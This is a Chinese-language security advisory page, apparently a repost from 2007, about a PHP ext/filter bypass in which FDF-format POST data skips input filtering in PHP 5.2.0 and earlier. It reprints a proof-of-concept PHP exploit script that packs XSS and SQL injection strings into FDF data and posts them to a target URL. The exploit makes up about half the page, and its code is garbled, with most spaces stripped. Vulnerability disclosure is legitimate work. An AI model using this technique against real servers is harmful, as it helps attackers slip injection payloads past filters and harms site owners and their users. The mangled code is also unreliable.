 |
PHP ext/filter FDF Post数据过滤绕过漏洞
www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------ |
受影响系统:
PHPPHP<=5.2.0 描述:
BUGTRAQ ID: PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP新实现的ext/filterFDF扩展实现上存在漏洞,远程攻击者可能利用此绕过用户数据过滤,从而在服务器上执行各种注入攻击。 根据设计,PHP的内容过滤钩子会在所有解析用户输入并注册为变量的地方添加对输入过滤器的调用,以确定如何处理这些变量,但添加对其他POST内容类型支持的所有扩展也需要实现钩子,否则数据就会绕过过滤。如果安装了ext/fdf的话PHP就会捆绑一个对FDFPOST数据格式的扩展,但没有调用输入过滤器,因此攻击者就可能绕过所强制的过滤机制,获得非授权访问。 <*来源:StefanEsser( ) 链接: *> 测试方法:
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
//||||___ __ __||___ __ ___ __||___|_\|||||_\//
//|__|/_`||'_|/_`|/-_)|'\/-_)/_`||___|| _/|__|| _///
//|_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// ProofofconceptcodefromtheHardened-PHPProject //
// (C)Copyright2007StefanEsser //
// //
////////////////////////////////////////////////////////////////////////
// PHPext/filterFDFPOSTFilterBybassExploit //
////////////////////////////////////////////////////////////////////////
//Thisismeantasaprotectionagainstremotefileinclusion.
die("REMOVETHISLINE");
//_POSTisthearraythatwillbesenttotheurlin$url
$_POST=array();
$_POST['var1']="<script>alert(/XSS/);</script>";
$_POST['var2']="'UNIONSELECT";
$url="
//Youdonotneedtochangeanythingbelowthis
$outfdf=fdf_create();
foreach($_POSTas$key=>$value){
fdf_set_value($outfdf,$key,$value,0);
}
fdf_save($outfdf,"outtest.fdf");
fdf_close($outfdf);
$ret=file_get_contents("outtest.fdf");
unlink("outtest.fdf");
$params=array('http'=>array(
'method'=>'POST',
'content'=>$ret,
'header'=>'Content-Type:application/vnd.fdf'
));
$ctx=stream_context_create($params);
$fp=@fopen($url,'rb',false,$ctx);
if(!$fp){
die("Cannotopen$url");
}
$response=@stream_get_contents($fp);
echo$response;
echo"\n";
?>
建议:
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
|
|
| ------------------------------------------------------------------------------------------- |
上一篇:DedeCMS最新版存在暴物理地址BUG
下一篇:PHP ext/filter HTML标签去除绕过漏洞 |
| ------------------------------------------------------------------------------------------- |
|
|
|
 |
|
|
当前位置:
